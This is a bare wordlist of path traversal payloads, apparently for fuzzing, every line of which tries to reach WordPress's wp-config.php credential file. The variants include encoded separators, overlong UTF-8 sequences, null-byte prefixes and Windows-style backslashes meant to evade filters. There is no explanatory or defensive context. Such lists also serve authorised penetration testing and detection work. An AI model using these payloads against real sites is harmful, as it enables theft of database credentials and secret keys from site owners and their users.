../wp-config.php
../../wp-config.php
../../../wp-config.php
../../../../wp-config.php
../../../../../../../wp-config.php
..\..\wp-config.php
..\..\..\wp-config.php
..\..\..\..\wp-config.php
..%c0%af..%c0%afwp-config.php
..%c0%af..%c0%af..%c0%afwp-config.php
.../.../.../.../.../wp-config.php
…..\\\…..\\\…..\\\wp-config.php
%00../../../../../../wp-config.php
/../../../../../../../../wp-config.php
/./././././././././././wp-config.php
/../../../../../../../../../../../wp-config.php
/..\../..\../..\../..\../..\../..\../wp-config.php
/.\\./.\\./.\\./.\\./.\\./.\\./wp-config.php
..//..//..//..//..//wp-config.php
../../../../../../../../../../../../wp-config.php
..\..\..\..\..\..\..\..\..\..\wp-config.php
/../../../../../../../../../../../wp-config.php
../../../../../../../../../../../../wp-config.php
../../../../../wp-config.php
../../../../wp-config.php
../../../wp-config.php
../../wp-config.php
../wp-config.php